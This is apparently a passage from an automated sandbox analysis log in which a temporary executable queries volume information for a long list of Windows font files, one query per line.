Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
